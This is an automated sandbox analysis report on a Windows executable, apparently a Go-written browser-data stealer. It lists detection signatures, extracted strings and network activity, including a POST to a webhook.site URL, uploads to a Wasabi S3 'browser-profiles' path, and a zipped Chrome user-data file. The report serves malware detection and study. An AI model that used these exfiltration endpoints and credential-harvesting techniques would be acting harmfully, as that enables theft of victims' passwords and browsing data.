Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1497447
MD5:5470a4ef9f9a778dff7a1376912ddd8f
SHA1:42ce6e45adbea85a114bc670b8484a853cfa4c63
SHA256:f06d0f702c63deb3a0a86defa6730b5886522872f8bc6ad565a665c83f76b6ae
Tags:exe
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious sample
Tries to harvest and steal browser information (history, passwords, etc)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7564 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 5470A4EF9F9A778DFF7A1376912DDD8F)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.6% probability
Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebp, edi0_2_00783310
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp], edx0_2_007A14C0
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: file.exe, 00000000.00000002.1442531637.00000000023A2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: _apps":["aohghmighlieiainnegkcijnfilokake","aapocclcgogkmnckokdopfmhonfmgoek","felcaaldnbdncclmgdcncolpebgiejap","apdfllckaahabafndbhieahigkjlhalf","pjkljhegncpnkpknbcohdijeoejaedia","blpcfgokakmgnkcojhhkbfbldkacnbeo"]},"zerosuggest":{"cachedresults":")]}'\n[\"\",[\"michigan hockey johnny druskinis\",\"annular solar eclipse\",\"dow jones stock markets futures\",\"the morning show recap episode 5\",\"diablo 4 season 2 patch notes\",\"aritzia archive sale\",\"premier league tottenham liverpool\",\"chucky season 3 cast\"],[\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[],{\"google:clientdata\":{\"bpc\":false,\"tlw\":false},\"google:groupsinfo\":\"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\\u003d\",\"google:suggestdetail\":[{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002}],\"google:suggestrelevance\":[1257,1256,1255,1254,1253,1252,1251,1250],\"google:suggestsubtypes\":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],\"google:suggesttype\":[\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\"]}]"}},"managed":{"banner_state":2},"managed_user_id":"","name":"Person 1","password_account_storage_settings":{}},"protection":{"macs":{}},"safebrowsing":{"enabled":false,"enhanced":false,"event_timestamps":{},"metrics_last_log_time":"13340965310"},"sessions":{"event_log":[{"crashed":false,"time":"13340965310874395","type":0},{"did_schedule_command":true,"first_session_service":true,"tab_count":1,"time":"13340965314121830","type":2,"window_count":1},{"crashed":false,"time":"13340965340486488","type":0},{"did_schedule_command":true,"first_session_service":true,"tab_count":1,"time":"13340965347697726","type":2,"window_count":1},{"crashed":false,"time":"13340965894520000","type":0},{"did_schedule_command":false,"first_session_service":true,"tab_count":0,"time":"13340965895529112","type":2,"window_count":0},{"crashed":false,"time":"13340965896647302","type":0},{"did_schedule_command":false,"first_session_service":true,"tab_count":0,"time":"13340965897562572","type":2,"window_count":0},{"crashed":false,"time":"13340965899453521","type":0},{"did_schedule_command":false,"first_session_service":true,"tab_count":0,"time":"13340965900388040","type":2,"window_count":0},{"crashed":false,"time":"13340965902527967","type":0},{"did_schedule_command":false,"first_session_service":true,"tab_count":0,"time":"13340965907495322","type":2,"window_count":0},{"crashed":false,"time":"13340965909466868","type":0},{"did_schedule_command":false,"first_session_service":true,"tab_count":0,"time":"13340965910838554","type":2,"window_count":0},{"crashed":false,"time":"13340965912890131","type":0},{"did_schedule_command":false,"first_session_service":true,"tab_count":0,"time":"13340965913778449","type":2,"window_count":0}],"session_data_status":5},"settings":{"a11y":{"apply_page_colors_only_on_increased_contrast":true}},"signin":{"allowed":true},"spellcheck":{"d
Source: file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: webhook.site
Source: global trafficDNS traffic detected: DNS query: s3.ap-southeast-1.wasabisys.com
Source: unknownHTTP traffic detected: POST /efe6628a-60cc-4d7a-bd08-479e31e08de5 HTTP/1.1Host: webhook.siteUser-Agent: Go-http-client/1.1Content-Length: 309Content-Type: application/jsonAccept-Encoding: gzip
Source: file.exeString found in binary or memory: http://s3.amazonaws.com/doc/2006-03-01/
Source: file.exe, 00000000.00000002.1442531637.00000000024A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://s3.amazonaws.com/doc/2006-03-01/B
Source: file.exe, 00000000.00000002.1442531637.00000000024A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://s3.amazonaws.com/doc/2006-03-01/Created
Source: file.exe, 00000000.00000002.1442531637.00000000024D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://s3.amazonaws.com/doc/2006-03-01/https://s3.ap-southeast-1.wasabisys.com/browser-profiles/2024
Source: file.exe, 00000000.00000002.1442531637.0000000002560000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1442531637.0000000002438000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Network Persistent State.0.drString found in binary or memory: https://accounts.google.com
Source: file.exe, 00000000.00000002.1442531637.0000000002560000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1442531637.0000000002438000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.1442531637.0000000002560000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1442531637.0000000002438000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.1442531637.0000000002560000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1442531637.0000000002438000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Network Persistent State.0.drString found in binary or memory: https://chrome.google.com
Source: file.exe, 00000000.00000002.1442531637.00000000024DE000.00000004.00001000.00020000.00000000.sdmp, Top Sites.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Top Sites.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=enWeb
Source: Network Persistent State.0.drString found in binary or memory: https://clients2.google.com
Source: file.exe, 00000000.00000002.1442531637.00000000023A6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
Source: Network Persistent State.0.drString found in binary or memory: https://clients2.googleusercontent.com
Source: Reporting and NEL.0.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/chromewebstore
Source: Reporting and NEL.0.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
Source: file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drString found in binary or memory: https://docs.google.com/document/:
Source: file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drString found in binary or memory: https://docs.google.com/document/J
Source: file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1442531637.00000000023A2000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drString found in binary or memory: https://docs.google.com/presentation/:
Source: file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drString found in binary or memory: https://docs.google.com/presentation/J
Source: file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1442531637.00000000023A2000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drString found in binary or memory: https://docs.google.com/spreadsheets/:
Source: file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drString found in binary or memory: https://docs.google.com/spreadsheets/J
Source: file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1442531637.00000000023A2000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drString found in binary or memory: https://drive.google.com/:
Source: file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drString found in binary or memory: https://drive.google.com/?lfhs=2
Source: file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drString found in binary or memory: https://drive.google.com/J
Source: file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1442531637.00000000023A2000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: file.exe, 00000000.00000002.1442531637.0000000002560000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1442531637.0000000002438000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000002.1442531637.0000000002560000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1442531637.0000000002438000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000002.1442531637.0000000002560000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1442531637.0000000002438000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drString found in binary or memory: https://mail.google.com/mail/:
Source: file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drString found in binary or memory: https://mail.google.com/mail/J
Source: file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1442531637.00000000023A2000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: file.exe, 00000000.00000002.1442531637.00000000023A6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: file.exe, 00000000.00000002.1442531637.00000000024D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://s3.ap-southeast-1.wasabisys.com/browser-profiles/202408220240822093937-19882742-CC56-1A59-97
Source: file.exe, 00000000.00000002.1442531637.0000000002314000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1442531637.000000000236A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://s3.ap-southeast-1.wasabisys.com/browser-profiles/20240822093937-19882742-CC56-1A59-9779-FB8C
Source: file.exe, 00000000.00000002.1442531637.00000000023A6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: Network Persistent State.0.drString found in binary or memory: https://update.googleapis.com
Source: file.exe, 00000000.00000002.1442531637.00000000024D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://webhook.site/efe6628a-60cc-4d7a-bd08-479e31e08de5
Source: file.exe, 00000000.00000002.1442531637.00000000024F6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://webhook.site/efe6628a-60cc-4d7a-bd08-479e31e08de5Temp
Source: file.exe, 00000000.00000002.1442531637.00000000024D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://webhook.site/efe6628a-60cc-4d7a-bd08-479e31e08de5https://webhook.site/efe6628a-60cc-4d7a-bd0
Source: file.exe, 00000000.00000002.1442531637.0000000002560000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1442531637.0000000002438000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.drString found in binary or memory: https://www.ecosia.org/newtab/
Source: Network Persistent State.0.drString found in binary or memory: https://www.google.com
Source: file.exe, 00000000.00000002.1442531637.00000000023A6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
Source: file.exe, 00000000.00000002.1442531637.0000000002560000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1442531637.0000000002438000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Network Persistent State.0.drString found in binary or memory: https://www.googleapis.com
Source: file.exe, 00000000.00000002.1442531637.00000000023A6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
Source: file.exe, 00000000.00000002.1442531637.00000000023A6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: file.exe, 00000000.00000002.1442531637.00000000023A6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: file.exe, 00000000.00000002.1442531637.00000000023A6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra
Source: file.exe, 00000000.00000002.1442531637.00000000023A6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drString found in binary or memory: https://www.youtube.com/:
Source: file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drString found in binary or memory: https://www.youtube.com/?feature=ytca
Source: file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drString found in binary or memory: https://www.youtube.com/J
Source: file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1442531637.00000000023A2000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54497
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 54497 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007898B00_2_007898B0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007839300_2_00783930
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007933200_2_00793320
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007833100_2_00783310
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B03A00_2_007B03A0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007CBE400_2_007CBE40
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0078D6100_2_0078D610
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079C7300_2_0079C730
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00793F7B0_2_00793F7B
Source: C:\Users\user\Desktop\file.exeCode function: String function: 007BA440 appears 205 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 007BCAE0 appears 186 times
Source: file.exeStatic PE information: Number of sections : 14 > 10
Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exeStatic PE information: Section: /19 ZLIB complexity 0.9994580160744501
Source: file.exeStatic PE information: Section: /32 ZLIB complexity 0.9970611857476636
Source: file.exeStatic PE information: Section: /65 ZLIB complexity 0.9992726893095768
Source: file.exeStatic PE information: Section: /90 ZLIB complexity 0.9919240552325581
Source: classification engineClassification label: mal48.spyw.winEXE@1/84@3/3
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\user_data.zipJump to behavior
Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Affiliation Database.0.drBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: Login Data For Account.0.dr, Login Data.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exeString found in binary or memory: concurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:sec
Source: file.exeString found in binary or memory: concurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:sec
Source: file.exeString found in binary or memory: runtime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:sec
Source: file.exeString found in binary or memory: runtime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:sec
Source: file.exeString found in binary or memory: /memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspin
Source: file.exeString found in binary or memory: /memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspin
Source: file.exeString found in binary or memory: /sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack
Source: file.exeString found in binary or memory: /sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack
Source: file.exeString found in binary or memory: /gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus old
Source: file.exeString found in binary or memory: /gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus old
Source: file.exeString found in binary or memory: /memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent loc
Source: file.exeString found in binary or memory: /memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent loc
Source: file.exeString found in binary or memory: /cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power
Source: file.exeString found in binary or memory: /cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power
Source: file.exeString found in binary or memory: /cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.ins
Source: file.exeString found in binary or memory: /cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.ins
Source: file.exeString found in binary or memory: ) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime:
Source: file.exeString found in binary or memory: ) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime:
Source: file.exeString found in binary or memory: lfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser are
Source: file.exeString found in binary or memory: lfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser are
Source: file.exeString found in binary or memory: /sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime:
Source: file.exeString found in binary or memory: /sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime:
Source: file.exeString found in binary or memory: /memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime:
Source: file.exeString found in binary or memory: /memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime:
Source: file.exeString found in binary or memory: runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime:
Source: file.exeString found in binary or memory: runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime:
Source: file.exeString found in binary or memory: uncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable t
Source: file.exeString found in binary or memory: uncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable t
Source: file.exeString found in binary or memory: superfluous leading zeros in lengthP224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitychacha20: output smaller than inputtransform: short destination bufferJSON value is not a structure (%#v)9d3f624caca482e8209131a76fc6dc09032c9d2d98b5769dcc48087ef7011677c5340e5d970f361a447a05fb5c2d752f0690854026fcbytes.Reader.Seek: negative positioncrypto/cipher: input not full blocksjson: encoding error for type %q: %qhttp: unexpected EOF reading trailer LastStreamID=%v ErrCode=%v Debug=%qRoundTrip retrying after failure: %vno acceptable authentication methodslfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnable
